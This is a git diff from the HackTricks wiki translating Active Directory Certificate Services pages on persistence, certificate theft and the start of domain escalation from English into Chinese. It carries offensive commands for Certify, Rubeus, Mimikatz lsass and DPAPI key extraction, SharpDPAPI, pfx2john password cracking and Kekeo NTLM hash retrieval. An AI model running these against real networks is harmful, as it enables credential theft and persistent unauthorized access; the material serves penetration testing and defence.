-- **Certification Authorities** container holds trusted root CA certificates.
-- **Enrolment Services** container details Enterprise CAs and their certificate templates.
-- **NTAuthCertificates** object includes CA certificates authorized for AD authentication.
-- **AIA (Authority Information Access)** container facilitates certificate chain validation with intermediate and cross CA certificates.
+- **Certification Authorities** 容器保存受信任的根 CA 证书。
+- **Enrolment Services** 容器详细说明企业 CA 及其证书模板。
+- **NTAuthCertificates** 对象包括被授权用于 AD 认证的 CA 证书。
+- **AIA (Authority Information Access)** 容器通过中间和交叉 CA 证书促进证书链验证。
 
-### Certificate Acquisition: Client Certificate Request Flow
+### 证书获取：客户端证书请求流程
 
-1. The request process begins with clients finding an Enterprise CA.
-2. A CSR is created, containing a public key and other details, after generating a public-private key pair.
-3. The CA assesses the CSR against available certificate templates, issuing the certificate based on the template's permissions.
-4. Upon approval, the CA signs the certificate with its private key and returns it to the client.
+1. 请求过程从客户端查找企业 CA 开始。
+2. 在生成公私钥对后，创建包含公钥和其他详细信息的 CSR。
+3. CA 根据可用证书模板评估 CSR，基于模板的权限颁发证书。
+4. 经批准后，CA 使用其私钥签署证书并将其返回给客户端。
 
-### Certificate Templates
+### 证书模板
 
-Defined within AD, these templates outline the settings and permissions for issuing certificates, including permitted EKUs and enrollment or modification rights, critical for managing access to certificate services.
+在 AD 中定义，这些模板概述了颁发证书的设置和权限，包括允许的 EKUs 和注册或修改权限，对于管理证书服务的访问至关重要。
 
-## Certificate Enrollment
+## 证书注册
 
-The enrollment process for certificates is initiated by an administrator who **creates a certificate template**, which is then **published** by an Enterprise Certificate Authority (CA). This makes the template available for client enrollment, a step achieved by adding the template's name to the `certificatetemplates` field of an Active Directory object.
+证书的注册过程由管理员 **创建证书模板** 开始，然后由企业证书颁发机构 (CA) **发布**。这使得模板可用于客户端注册，通过将模板名称添加到 Active Directory 对象的 `certificatetemplates` 字段来实现。
 
-For a client to request a certificate, **enrollment rights** must be granted. These rights are defined by security descriptors on the certificate template and the Enterprise CA itself. Permissions must be granted in both locations for a request to be successful.
+为了让客户端请求证书，必须授予 **注册权限**。这些权限由证书模板和企业 CA 本身的安全描述符定义。必须在两个位置授予权限，才能成功请求。
 
-### Template Enrollment Rights
+### 模板注册权限
 
-These rights are specified through Access Control Entries (ACEs), detailing permissions like:
+这些权限通过访问控制条目 (ACEs) 指定，详细说明权限，如：
 
-- **Certificate-Enrollment** and **Certificate-AutoEnrollment** rights, each associated with specific GUIDs.
-- **ExtendedRights**, allowing all extended permissions.
-- **FullControl/GenericAll**, providing complete control over the template.
+- **Certificate-Enrollment** 和 **Certificate-AutoEnrollment** 权限，每个权限与特定 GUID 相关联。
+- **ExtendedRights**，允许所有扩展权限。
+- **FullControl/GenericAll**，提供对模板的完全控制。
 
-### Enterprise CA Enrollment Rights
+### 企业 CA 注册权限
 
-The CA's rights are outlined in its security descriptor, accessible via the Certificate Authority management console. Some settings even allow low-privileged users remote access, which could be a security concern.
+CA 的权限在其安全描述符中列出，可以通过证书颁发机构管理控制台访问。有些设置甚至允许低权限用户远程访问，这可能是一个安全隐患。
 
-### Additional Issuance Controls
+### 额外的颁发控制
 
-Certain controls may apply, such as:
+某些控制可能适用，例如：
 
-- **Manager Approval**: Places requests in a pending state until approved by a certificate manager.
-- **Enrolment Agents and Authorized Signatures**: Specify the number of required signatures on a CSR and the necessary Application Policy OIDs.
+- **经理批准**：将请求置于待处理状态，直到由证书经理批准。
+- **注册代理和授权签名**：指定 CSR 上所需的签名数量和必要的应用程序策略 OIDs。
 
-### Methods to Request Certificates
+### 请求证书的方法
 
-Certificates can be requested through:
+可以通过以下方式请求证书：
 
-1. **Windows Client Certificate Enrollment Protocol** (MS-WCCE), using DCOM interfaces.
-2. **ICertPassage Remote Protocol** (MS-ICPR), through named pipes or TCP/IP.
-3. The **certificate enrollment web interface**, with the Certificate Authority Web Enrollment role installed.
-4. The **Certificate Enrollment Service** (CES), in conjunction with the Certificate Enrollment Policy (CEP) service.
-5. The **Network Device Enrollment Service** (NDES) for network devices, using the Simple Certificate Enrollment Protocol (SCEP).
-
-Windows users can also request certificates via the GUI (`certmgr.msc` or `certlm.msc`) or command-line tools (`certreq.exe` or PowerShell's `Get-Certificate` command).
+1. **Windows 客户端证书注册协议** (MS-WCCE)，使用 DCOM 接口。
+2. **ICertPassage 远程协议** (MS-ICPR)，通过命名管道或 TCP/IP。
+3. **证书注册 Web 界面**，安装了证书颁发机构 Web 注册角色。
+4. **证书注册服务** (CES)，与证书注册策略 (CEP) 服务结合使用。
+5. **网络设备注册服务** (NDES) 用于网络设备，使用简单证书注册协议 (SCEP)。
 
+Windows 用户还可以通过 GUI (`certmgr.msc` 或 `certlm.msc`) 或命令行工具 (`certreq.exe` 或 PowerShell 的 `Get-Certificate` 命令) 请求证书。
 ```powershell
 # Example of requesting a certificate using PowerShell
 Get-Certificate -Template "User" -CertStoreLocation "cert:\\CurrentUser\\My"
 ```
+## 证书认证
 
-## Certificate Authentication
+Active Directory (AD) 支持证书认证，主要利用 **Kerberos** 和 **安全通道 (Schannel)** 协议。
 
-Active Directory (AD) supports certificate authentication, primarily utilizing **Kerberos** and **Secure Channel (Schannel)** protocols.
-
-### Kerberos Authentication Process
-
-In the Kerberos authentication process, a user's request for a Ticket Granting Ticket (TGT) is signed using the **private key** of the user's certificate. This request undergoes several validations by the domain controller, including the certificate's **validity**, **path**, and **revocation status**. Validations also include verifying that the certificate comes from a trusted source and confirming the issuer's presence in the **NTAUTH certificate store**. Successful validations result in the issuance of a TGT. The **`NTAuthCertificates`** object in AD, found at:
+### Kerberos 认证过程
 
+在 Kerberos 认证过程中，用户请求的票证授予票证 (TGT) 使用用户证书的 **私钥** 进行签名。该请求经过域控制器的多项验证，包括证书的 **有效性**、**路径** 和 **撤销状态**。验证还包括确认证书来自受信任的来源，并确认发行者在 **NTAUTH 证书存储** 中的存在。成功的验证将导致 TGT 的发放。AD 中的 **`NTAuthCertificates`** 对象位于：
 ```bash
 CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>
 ```
+在证书认证中建立信任是至关重要的。
 
-is central to establishing trust for certificate authentication.
+### 安全通道 (Schannel) 认证
 
-### Secure Channel (Schannel) Authentication
+Schannel 促进安全的 TLS/SSL 连接，在握手过程中，客户端提供一个证书，如果成功验证，则授权访问。将证书映射到 AD 账户可能涉及 Kerberos 的 **S4U2Self** 函数或证书的 **主题备用名称 (SAN)**，以及其他方法。
 
-Schannel facilitates secure TLS/SSL connections, where during a handshake, the client presents a certificate that, if successfully validated, authorizes access. The mapping of a certificate to an AD account may involve Kerberos’s **S4U2Self** function or the certificate’s **Subject Alternative Name (SAN)**, among other methods.
+### AD 证书服务枚举
 
-### AD Certificate Services Enumeration
-
-AD's certificate services can be enumerated through LDAP queries, revealing information about **Enterprise Certificate Authorities (CAs)** and their configurations. This is accessible by any domain-authenticated user without special privileges. Tools like **[Certify](https://github.com/GhostPack/Certify)** and **[Certipy](https://github.com/ly4k/Certipy)** are used for enumeration and vulnerability assessment in AD CS environments.
-
-Commands for using these tools include:
+AD 的证书服务可以通过 LDAP 查询进行枚举，揭示有关 **企业证书颁发机构 (CAs)** 及其配置的信息。这对任何经过域认证的用户都是可访问的，无需特殊权限。工具如 **[Certify](https://github.com/GhostPack/Certify)** 和 **[Certipy](https://github.com/ly4k/Certipy)** 用于在 AD CS 环境中的枚举和漏洞评估。
 
+使用这些工具的命令包括：
 ```bash
 # Enumerate trusted root CA certificates and Enterprise CAs with Certify
 Certify.exe cas
@@ -120,11 +115,9 @@ certipy find -vulnerable -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
 certutil.exe -TCAInfo
 certutil -v -dstemplate
 ```
-
-## References
+## 参考
 
 - [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)
 - [https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html](https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
index b726249af..4262a94ac 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
@@ -1,56 +1,45 @@
-# AD CS Account Persistence
+# AD CS 账户持久性
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**This is a small summary of the machine persistence chapters of the awesome research from [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**
+**这是对[https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)中精彩研究的机器持久性章节的小总结**
 
-## **Understanding Active User Credential Theft with Certificates – PERSIST1**
+## **理解通过证书进行的活动用户凭证盗窃 – PERSIST1**
 
-In a scenario where a certificate that allows domain authentication can be requested by a user, an attacker has the opportunity to **request** and **steal** this certificate to **maintain persistence** on a network. By default, the `User` template in Active Directory allows such requests, though it may sometimes be disabled.
-
-Using a tool named [**Certify**](https://github.com/GhostPack/Certify), one can search for valid certificates that enable persistent access:
+在用户可以请求允许域身份验证的证书的场景中，攻击者有机会**请求**并**窃取**该证书以**维持在网络上的持久性**。默认情况下，Active Directory中的`User`模板允许此类请求，尽管有时可能会被禁用。
 
+使用名为[**Certify**](https://github.com/GhostPack/Certify)的工具，可以搜索启用持久访问的有效证书：
 ```bash
 Certify.exe find /clientauth
 ```
+强调了证书的力量在于它能够**作为其所属用户进行身份验证**，无论任何密码更改，只要证书保持**有效**。
 
-It's highlighted that a certificate's power lies in its ability to **authenticate as the user** it belongs to, regardless of any password changes, as long as the certificate remains **valid**.
-
-Certificates can be requested through a graphical interface using `certmgr.msc` or through the command line with `certreq.exe`. With **Certify**, the process to request a certificate is simplified as follows:
-
+可以通过图形界面使用 `certmgr.msc` 或通过命令行使用 `certreq.exe` 请求证书。使用**Certify**，请求证书的过程简化如下：
 ```bash
 Certify.exe request /ca:CA-SERVER\CA-NAME /template:TEMPLATE-NAME
 ```
-
-Upon successful request, a certificate along with its private key is generated in `.pem` format. To convert this into a `.pfx` file, which is usable on Windows systems, the following command is utilized:
-
+在成功请求后，将生成一个证书及其私钥，格式为 `.pem`。要将其转换为可在 Windows 系统上使用的 `.pfx` 文件，使用以下命令：
 ```bash
 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 ```
-
-The `.pfx` file can then be uploaded to a target system and used with a tool called [**Rubeus**](https://github.com/GhostPack/Rubeus) to request a Ticket Granting Ticket (TGT) for the user, extending the attacker's access for as long as the certificate is **valid** (typically one year):
-
+`.pfx` 文件可以上传到目标系统，并与一个名为 [**Rubeus**](https://github.com/GhostPack/Rubeus) 的工具一起使用，以请求用户的票据授权票证 (TGT)，从而在证书 **有效**（通常为一年）期间延长攻击者的访问权限：
 ```bash
 Rubeus.exe asktgt /user:harmj0y /certificate:C:\Temp\cert.pfx /password:CertPass!
 ```
+一个重要的警告是，这种技术与**THEFT5**部分中概述的另一种方法结合使用时，允许攻击者在不与本地安全授权子系统服务（LSASS）交互的情况下，持久性地获取账户的**NTLM hash**，并且在非提升的上下文中提供了一种更隐蔽的长期凭证窃取方法。
 
-An important warning is shared about how this technique, combined with another method outlined in the **THEFT5** section, allows an attacker to persistently obtain an account’s **NTLM hash** without interacting with the Local Security Authority Subsystem Service (LSASS), and from a non-elevated context, providing a stealthier method for long-term credential theft.
-
-## **Gaining Machine Persistence with Certificates - PERSIST2**
-
-Another method involves enrolling a compromised system’s machine account for a certificate, utilizing the default `Machine` template which allows such actions. If an attacker gains elevated privileges on a system, they can use the **SYSTEM** account to request certificates, providing a form of **persistence**:
+## **通过证书获得机器持久性 - PERSIST2**
 
+另一种方法涉及为被攻陷系统的机器账户注册证书，利用默认的`Machine`模板允许此类操作。如果攻击者在系统上获得提升的权限，他们可以使用**SYSTEM**账户请求证书，从而提供一种**持久性**形式：
 ```bash
 Certify.exe request /ca:dc.theshire.local/theshire-DC-CA /template:Machine /machine
 ```
+这种访问权限使攻击者能够以机器帐户身份对 **Kerberos** 进行身份验证，并利用 **S4U2Self** 获取主机上任何服务的 Kerberos 服务票证，从而有效地授予攻击者对该机器的持久访问权限。
 
-This access enables the attacker to authenticate to **Kerberos** as the machine account and utilize **S4U2Self** to obtain Kerberos service tickets for any service on the host, effectively granting the attacker persistent access to the machine.
+## **通过证书续订扩展持久性 - PERSIST3**
 
-## **Extending Persistence Through Certificate Renewal - PERSIST3**
+最后讨论的方法涉及利用证书模板的 **有效性** 和 **续订周期**。通过在证书到期之前 **续订** 证书，攻击者可以在不需要额外票证注册的情况下保持对 Active Directory 的身份验证，这可能会在证书授权 (CA) 服务器上留下痕迹。
 
-The final method discussed involves leveraging the **validity** and **renewal periods** of certificate templates. By **renewing** a certificate before its expiration, an attacker can maintain authentication to Active Directory without the need for additional ticket enrolments, which could leave traces on the Certificate Authority (CA) server.
-
-This approach allows for an **extended persistence** method, minimizing the risk of detection through fewer interactions with the CA server and avoiding the generation of artifacts that could alert administrators to the intrusion.
+这种方法允许一种 **扩展持久性** 方法，通过与 CA 服务器的较少交互来最小化被检测的风险，并避免生成可能会提醒管理员入侵的工件。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
index 56c155a71..6f831f48e 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
@@ -1,13 +1,12 @@
-# AD CS Certificate Theft
+# AD CS 证书盗窃
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**This is a small summary of the Theft chapters of the awesome research from [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**
+**这是来自[https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)的精彩研究中盗窃章节的小总结**
 
-## What can I do with a certificate
-
-Before checking how to steal the certificates here you have some info about how to find what the certificate is useful for:
+## 我可以用证书做什么
 
+在检查如何盗取证书之前，这里有一些关于如何找到证书用途的信息：
 ```powershell
 # Powershell
 $CertPath = "C:\path\to\cert.pfx"
@@ -19,35 +18,33 @@ $Cert.EnhancedKeyUsageList
 # cmd
 certutil.exe -dump -v cert.pfx
 ```
+## 导出证书使用 Crypto APIs – THEFT1
 
-## Exporting Certificates Using the Crypto APIs – THEFT1
+在 **交互式桌面会话**中，提取用户或机器证书及其私钥非常简单，特别是如果 **私钥是可导出的**。可以通过导航到 `certmgr.msc` 中的证书，右键单击并选择 `所有任务 → 导出` 来生成一个受密码保护的 .pfx 文件。
 
-In an **interactive desktop session**, extracting a user or machine certificate, along with the private key, can be easily done, particularly if the **private key is exportable**. This can be achieved by navigating to the certificate in `certmgr.msc`, right-clicking on it, and selecting `All Tasks → Export` to generate a password-protected .pfx file.
+对于 **编程方法**，可以使用 PowerShell 的 `ExportPfxCertificate` cmdlet 或像 [TheWover’s CertStealer C# project](https://github.com/TheWover/CertStealer) 这样的项目。这些工具利用 **Microsoft CryptoAPI** (CAPI) 或加密 API：下一代 (CNG) 与证书存储进行交互。这些 API 提供了一系列加密服务，包括证书存储和身份验证所需的服务。
 
-For a **programmatic approach**, tools such as the PowerShell `ExportPfxCertificate` cmdlet or projects like [TheWover’s CertStealer C# project](https://github.com/TheWover/CertStealer) are available. These utilize the **Microsoft CryptoAPI** (CAPI) or the Cryptography API: Next Generation (CNG) to interact with the certificate store. These APIs provide a range of cryptographic services, including those necessary for certificate storage and authentication.
+然而，如果私钥被设置为不可导出，CAPI 和 CNG 通常会阻止提取此类证书。为了绕过此限制，可以使用 **Mimikatz** 工具。Mimikatz 提供 `crypto::capi` 和 `crypto::cng` 命令来修补相应的 API，从而允许导出私钥。具体而言，`crypto::capi` 修补当前进程中的 CAPI，而 `crypto::cng` 针对 **lsass.exe** 的内存进行修补。
 
-However, if a private key is set as non-exportable, both CAPI and CNG will normally block the extraction of such certificates. To bypass this restriction, tools like **Mimikatz** can be employed. Mimikatz offers `crypto::capi` and `crypto::cng` commands to patch the respective APIs, allowing for the exportation of private keys. Specifically, `crypto::capi` patches the CAPI within the current process, while `crypto::cng` targets the memory of **lsass.exe** for patching.
+## 通过 DPAPI 进行用户证书盗窃 – THEFT2
 
-## User Certificate Theft via DPAPI – THEFT2
-
-More info about DPAPI in:
+有关 DPAPI 的更多信息，请参见：
 
 {{#ref}}
 ../../windows-local-privilege-escalation/dpapi-extracting-passwords.md
 {{#endref}}
 
-In Windows, **certificate private keys are safeguarded by DPAPI**. It's crucial to recognize that the **storage locations for user and machine private keys** are distinct, and the file structures vary depending on the cryptographic API utilized by the operating system. **SharpDPAPI** is a tool that can navigate these differences automatically when decrypting the DPAPI blobs.
+在 Windows 中，**证书私钥由 DPAPI 保护**。重要的是要认识到 **用户和机器私钥的存储位置**是不同的，文件结构因操作系统使用的加密 API 而异。**SharpDPAPI** 是一个可以在解密 DPAPI blobs 时自动导航这些差异的工具。
 
-**User certificates** are predominantly housed in the registry under `HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates`, but some can also be found in the directory `%APPDATA%\Microsoft\SystemCertificates\My\Certificates`. The corresponding **private keys** for these certificates are typically stored in `%APPDATA%\Microsoft\Crypto\RSA\User SID\` for **CAPI** keys and `%APPDATA%\Microsoft\Crypto\Keys\` for **CNG** keys.
+**用户证书**主要存放在注册表下的 `HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates`，但有些也可以在目录 `%APPDATA%\Microsoft\SystemCertificates\My\Certificates` 中找到。这些证书的相应 **私钥** 通常存储在 `%APPDATA%\Microsoft\Crypto\RSA\User SID\` 中用于 **CAPI** 密钥，而用于 **CNG** 密钥则存储在 `%APPDATA%\Microsoft\Crypto\Keys\` 中。
 
-To **extract a certificate and its associated private key**, the process involves:
+要 **提取证书及其相关私钥**，过程包括：
 
-1. **Selecting the target certificate** from the user’s store and retrieving its key store name.
-2. **Locating the required DPAPI masterkey** to decrypt the corresponding private key.
-3. **Decrypting the private key** by utilizing the plaintext DPAPI masterkey.
-
-For **acquiring the plaintext DPAPI masterkey**, the following approaches can be used:
+1. **从用户的存储中选择目标证书** 并检索其密钥存储名称。
+2. **定位所需的 DPAPI 主密钥** 以解密相应的私钥。
+3. **利用明文 DPAPI 主密钥解密私钥**。
 
+对于 **获取明文 DPAPI 主密钥**，可以使用以下方法：
 ```bash
 # With mimikatz, when running in the user's context
 dpapi::masterkey /in:"C:\PATH\TO\KEY" /rpc
@@ -55,9 +52,7 @@ dpapi::masterkey /in:"C:\PATH\TO\KEY" /rpc
 # With mimikatz, if the user's password is known
 dpapi::masterkey /in:"C:\PATH\TO\KEY" /sid:accountSid /password:PASS
 ```
-
-To streamline the decryption of masterkey files and private key files, the `certificates` command from [**SharpDPAPI**](https://github.com/GhostPack/SharpDPAPI) proves beneficial. It accepts `/pvk`, `/mkfile`, `/password`, or `{GUID}:KEY` as arguments to decrypt the private keys and linked certificates, subsequently generating a `.pem` file.
-
+为了简化主密钥文件和私钥文件的解密，来自 [**SharpDPAPI**](https://github.com/GhostPack/SharpDPAPI) 的 `certificates` 命令非常有用。它接受 `/pvk`、`/mkfile`、`/password` 或 `{GUID}:KEY` 作为参数来解密私钥和相关证书，随后生成一个 `.pem` 文件。
 ```bash
 # Decrypting using SharpDPAPI
 SharpDPAPI.exe certificates /mkfile:C:\temp\mkeys.txt
@@ -65,28 +60,26 @@ SharpDPAPI.exe certificates /mkfile:C:\temp\mkeys.txt
 # Converting .pem to .pfx
 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 ```
+## 机器证书盗窃通过 DPAPI – THEFT3
 
-## Machine Certificate Theft via DPAPI – THEFT3
+Windows 在注册表中存储的机器证书位于 `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates`，相关的私钥位于 `%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys`（用于 CAPI）和 `%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\Keys`（用于 CNG），这些证书使用机器的 DPAPI 主密钥进行加密。这些密钥无法使用域的 DPAPI 备份密钥解密；相反，需要 **DPAPI_SYSTEM LSA 密钥**，只有 SYSTEM 用户可以访问。
 
-Machine certificates stored by Windows in the registry at `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates` and the associated private keys located in `%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys` (for CAPI) and `%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\Keys` (for CNG) are encrypted using the machine's DPAPI master keys. These keys cannot be decrypted with the domain’s DPAPI backup key; instead, the **DPAPI_SYSTEM LSA secret**, which only the SYSTEM user can access, is required.
+手动解密可以通过在 **Mimikatz** 中执行 `lsadump::secrets` 命令来提取 DPAPI_SYSTEM LSA 密钥，然后使用该密钥解密机器主密钥。或者，在修补 CAPI/CNG 后，可以使用 Mimikatz 的 `crypto::certificates /export /systemstore:LOCAL_MACHINE` 命令。
 
-Manual decryption can be achieved by executing the `lsadump::secrets` command in **Mimikatz** to extract the DPAPI_SYSTEM LSA secret, and subsequently using this key to decrypt the machine masterkeys. Alternatively, Mimikatz’s `crypto::certificates /export /systemstore:LOCAL_MACHINE` command can be used after patching CAPI/CNG as previously described.
+**SharpDPAPI** 提供了一种更自动化的方法，通过其证书命令。当使用 `/machine` 标志并具有提升的权限时，它会提升到 SYSTEM，转储 DPAPI_SYSTEM LSA 密钥，使用它解密机器 DPAPI 主密钥，然后将这些明文密钥用作查找表以解密任何机器证书私钥。
 
-**SharpDPAPI** offers a more automated approach with its certificates command. When the `/machine` flag is used with elevated permissions, it escalates to SYSTEM, dumps the DPAPI_SYSTEM LSA secret, uses it to decrypt the machine DPAPI masterkeys, and then employs these plaintext keys as a lookup table to decrypt any machine certificate private keys.
+## 查找证书文件 – THEFT4
 
-## Finding Certificate Files – THEFT4
+证书有时直接在文件系统中找到，例如在文件共享或下载文件夹中。针对 Windows 环境的最常见证书文件类型是 `.pfx` 和 `.p12` 文件。虽然不太常见，但扩展名为 `.pkcs12` 和 `.pem` 的文件也会出现。其他值得注意的与证书相关的文件扩展名包括：
 
-Certificates are sometimes found directly within the filesystem, such as in file shares or the Downloads folder. The most commonly encountered types of certificate files targeted towards Windows environments are `.pfx` and `.p12` files. Though less frequently, files with extensions `.pkcs12` and `.pem` also appear. Additional noteworthy certificate-related file extensions include:
+- `.key` 用于私钥，
+- `.crt`/`.cer` 仅用于证书，
+- `.csr` 用于证书签名请求，不包含证书或私钥，
+- `.jks`/`.keystore`/`.keys` 用于 Java 密钥库，可能包含 Java 应用程序使用的证书和私钥。
 
-- `.key` for private keys,
-- `.crt`/`.cer` for certificates only,
-- `.csr` for Certificate Signing Requests, which do not contain certificates or private keys,
-- `.jks`/`.keystore`/`.keys` for Java Keystores, which may hold certificates along with private keys utilized by Java applications.
-
-These files can be searched for using PowerShell or the command prompt by looking for the mentioned extensions.
-
-In cases where a PKCS#12 certificate file is found and it is protected by a password, the extraction of a hash is possible through the use of `pfx2john.py`, available at [fossies.org](https://fossies.org/dox/john-1.9.0-jumbo-1/pfx2john_8py_source.html). Subsequently, JohnTheRipper can be employed to attempt to crack the password.
+可以使用 PowerShell 或命令提示符通过查找上述扩展名来搜索这些文件。
 
+在找到受密码保护的 PKCS#12 证书文件的情况下，可以通过使用 `pfx2john.py` 提取哈希，该工具可在 [fossies.org](https://fossies.org/dox/john-1.9.0-jumbo-1/pfx2john_8py_source.html) 获取。随后，可以使用 JohnTheRipper 尝试破解密码。
 ```powershell
 # Example command to search for certificate files in PowerShell
 Get-ChildItem -Recurse -Path C:\Users\ -Include *.pfx, *.p12, *.pkcs12, *.pem, *.key, *.crt, *.cer, *.csr, *.jks, *.keystore, *.keys
@@ -97,22 +90,18 @@ pfx2john.py certificate.pfx > hash.txt
 # Command to crack the hash with JohnTheRipper
 john --wordlist=passwords.txt hash.txt
 ```
+## NTLM 凭证盗窃通过 PKINIT – THEFT5
 
-## NTLM Credential Theft via PKINIT – THEFT5
+给定内容解释了一种通过 PKINIT 进行 NTLM 凭证盗窃的方法，特别是通过标记为 THEFT5 的盗窃方法。以下是被动语态的重新解释，内容在适用时进行了匿名化和总结：
 
-The given content explains a method for NTLM credential theft via PKINIT, specifically through the theft method labeled as THEFT5. Here's a re-explanation in passive voice, with the content anonymized and summarized where applicable:
-
-To support NTLM authentication [MS-NLMP] for applications that do not facilitate Kerberos authentication, the KDC is designed to return the user's NTLM one-way function (OWF) within the privilege attribute certificate (PAC), specifically in the `PAC_CREDENTIAL_INFO` buffer, when PKCA is utilized. Consequently, should an account authenticate and secure a Ticket-Granting Ticket (TGT) via PKINIT, a mechanism is inherently provided which enables the current host to extract the NTLM hash from the TGT to uphold legacy authentication protocols. This process entails the decryption of the `PAC_CREDENTIAL_DATA` structure, which is essentially an NDR serialized depiction of the NTLM plaintext.
-
-The utility **Kekeo**, accessible at [https://github.com/gentilkiwi/kekeo](https://github.com/gentilkiwi/kekeo), is mentioned as capable of requesting a TGT containing this specific data, thereby facilitating the retrieval of the user's NTLM. The command utilized for this purpose is as follows:
+为了支持不便于 Kerberos 认证的应用程序的 NTLM 认证 [MS-NLMP]，KDC 被设计为在使用 PKCA 时返回用户的 NTLM 单向函数 (OWF)，具体在 `PAC_CREDENTIAL_INFO` 缓冲区中。因此，如果一个账户通过 PKINIT 进行身份验证并获取票据授权票 (TGT)，则固有地提供了一种机制，使当前主机能够从 TGT 中提取 NTLM 哈希，以维持遗留认证协议。此过程涉及对 `PAC_CREDENTIAL_DATA` 结构的解密，该结构本质上是 NTLM 明文的 NDR 序列化表示。
 
+提到的工具 **Kekeo**，可在 [https://github.com/gentilkiwi/kekeo](https://github.com/gentilkiwi/kekeo) 获取，能够请求包含此特定数据的 TGT，从而便于检索用户的 NTLM。用于此目的的命令如下：
 ```bash
 tgt::pac /caname:generic-DC-CA /subject:genericUser /castore:current_user /domain:domain.local
 ```
+此外，值得注意的是，Kekeo 可以处理智能卡保护的证书，只要可以检索到 PIN，参考 [https://github.com/CCob/PinSwipe](https://github.com/CCob/PinSwipe)。同样的功能也被 **Rubeus** 支持，地址为 [https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)。
 
-Additionally, it is noted that Kekeo can process smartcard-protected certificates, given the pin can be retrieved, with reference made to [https://github.com/CCob/PinSwipe](https://github.com/CCob/PinSwipe). The same capability is indicated to be supported by **Rubeus**, available at [https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus).
-
-This explanation encapsulates the process and tools involved in NTLM credential theft via PKINIT, focusing on the retrieval of NTLM hashes through TGT obtained using PKINIT, and the utilities that facilitate this process.
+此解释概述了通过 PKINIT 进行 NTLM 凭据盗窃的过程和工具，重点是通过使用 PKINIT 获得的 TGT 检索 NTLM 哈希，以及促进此过程的实用程序。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index 46ca77321..918318a42 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -1,4 +1,4 @@
-# AD CS Domain Escalation
+# AD CS 域升级
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -6,119 +6,108 @@
 
 {% embed url="https://websec.nl/" %}
 
-**This is a summary of escalation technique sections of the posts:**
+**这是升级技术部分的总结：**
 
 - [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf)
 - [https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
 - [https://github.com/ly4k/Certipy](https://github.com/ly4k/Certipy)
 
-## Misconfigured Certificate Templates - ESC1
+## 配置错误的证书模板 - ESC1
 
-### Explanation
+### 解释
 
-### Misconfigured Certificate Templates - ESC1 Explained
+### 配置错误的证书模板 - ESC1 解释
 
-- **Enrolment rights are granted to low-privileged users by the Enterprise CA.**
-- **Manager approval is not required.**
-- **No signatures from authorized personnel are needed.**
-- **Security descriptors on certificate templates are overly permissive, allowing low-privileged users to obtain enrolment rights.**
-- **Certificate templates are configured to define EKUs that facilitate authentication:**
-  - Extended Key Usage (EKU) identifiers such as Client Authentication (OID 1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (1.3.6.1.5.2.3.4), Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2), Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA) are included.
-- **The ability for requesters to include a subjectAltName in the Certificate Signing Request (CSR) is allowed by the template:**
